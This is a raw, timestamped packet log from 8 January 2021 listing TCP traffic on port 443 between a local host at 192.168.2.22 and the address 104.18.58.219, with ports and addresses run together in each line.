                                                        Jan 8, 2021 09:08:28.868220091 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.868243933 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.868319988 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.868926048 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.868952036 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.869019985 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.869621038 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.869652987 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.869719028 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.870234966 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.870259047 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.870321035 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.870871067 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.870889902 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.870953083 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.871527910 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.871557951 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.871613026 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.872226954 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.872255087 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.872314930 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.872904062 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.872931957 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.872992039 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.873579025 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.873605967 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.873687983 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.874202013 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.874233961 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.874295950 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.874842882 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.874871969 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.874994040 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.875575066 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.875596046 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.875663996 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.876199961 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.876219988 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.876281977 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.876841068 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.876859903 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.876936913 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.908121109 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.057967901 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.057996988 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.058195114 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.058231115 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.058255911 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.058331966 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.058655977 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.058677912 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.058882952 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.059303045 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.059329987 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.059386969 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.060055971 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.060082912 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.060129881 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.060668945 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.060689926 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.060733080 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.061331987 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.061362028 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.061412096 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.061988115 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.062015057 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.062068939 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.062731981 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.062752008 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.062823057 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.063267946 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.063292980 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.063354015 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.063924074 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.063947916 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.064002991 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.064594984 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.064615011 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.064667940 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.065367937 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.065433979 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.065488100 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.065931082 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.065957069 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.066005945 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.066584110 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.066613913 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.066669941 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.067257881 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.067286015 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.067343950 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.067904949 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.067934036 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.729147911 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.729190111 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.729247093 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.729849100 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.729890108 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.729948044 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.730457067 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.730496883 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.730545044 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.731142044 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.731179953 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.731225967 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.731781960 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.734494925 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.734532118 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.734627008 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.734781027 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.734822989 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.735048056 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.735443115 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.735481977 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.735532045 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.736145020 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.736185074 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.736238956 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.736766100 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.736804962 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.736871958 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.737452030 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.737490892 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.737570047 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.738080025 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.738118887 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.738173962 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.738740921 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.738782883 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.738831997 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.739425898 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.739463091 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.739526987 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.740058899 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.740098000 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.740150928 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.740735054 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.740773916 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.740832090 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.741451979 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.741487980 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.741542101 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.742064953 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.742103100 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.742158890 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.742734909 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.742774963 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.742837906 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.743376970 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.743412971 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.743573904 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.744055986 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.744091988 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.744142056 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.744739056 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.744774103 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.744823933 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.745357037 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.745419979 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.745528936 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.746156931 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.746191978 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.746351004 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.746699095 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.746732950 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.746798038 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.747334003 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.747368097 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.747422934 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.747997999 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.748033047 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.748143911 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.748667955 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.748702049 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.748764038 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.749324083 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.749356985 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.749596119 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.750000954 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.750030041 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.750108957 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.902704000 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.902765036 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.902808905 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.902848005 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.902889967 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.902945042 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.903498888 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.903541088 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.903628111 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.904175997 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.904211044 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.904305935 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.904836893 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.904881954 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.904958010 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.905474901 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.905518055 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.905608892 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.906259060 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.906302929 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.906371117 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.906785965 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.906927109 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.907021999 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.907459021 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.907500029 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.907656908 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.908101082 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.908143044 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.908236027 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.908793926 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.908833027 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.908915043 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.909481049 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.909523964 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.909630060 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.910294056 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.910341024 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.910429001 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.910767078 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.910806894 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.910937071 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.911451101 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.911493063 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.911581993 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.912103891 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.912146091 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.912241936 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.912733078 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.912784100 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.912977934 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.913650990 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.913695097 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.913870096 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.914453030 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.914491892 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.914591074 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.914864063 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.914905071 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.914968967 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.915407896 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.915452003 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.915539026 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.916059971 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.916101933 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.916191101 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.916734934 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.916779041 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.916851044 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.917426109 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.917467117 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.917547941 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.918020964 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.918054104 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.918122053 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.918417931 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.918461084 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.918529987 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.919120073 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.919158936 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.919250965 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.919729948 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.919770002 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.919846058 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.920389891 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.920432091 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.920514107 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.921047926 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.921097994 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.921174049 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.921761990 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.921807051 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.921880007 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.922373056 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.922415972 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.922482967 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.923057079 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.923099041 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.923163891 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.923732996 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.923774958 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.923854113 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.924488068 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.924531937 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.924598932 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.925009966 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.925050020 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.925112009 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.925687075 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.925728083 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.925786972 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.926368952 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.072148085 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.072207928 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.072247982 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.072297096 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.072446108 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.072946072 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.072989941 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.073215961 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.073575974 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.073617935 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.073703051 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.074234009 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.074276924 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.074400902 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.074892998 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.074935913 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.075012922 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.075540066 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.075578928 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.075681925 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.076190948 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.076231956 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.076293945 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.076847076 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.076896906 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.466332912 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.466375113 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.466423035 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.466427088 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.466945887 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.466985941 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.467008114 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.467034101 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.467082977 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.467792034 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.467844963 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.467885971 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.467905998 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.468707085 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.468755960 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.468790054 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.468899012 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.469590902 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.469630003 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.469669104 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.469686031 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.470567942 CET44349177104.18.58.219192.168.2.22
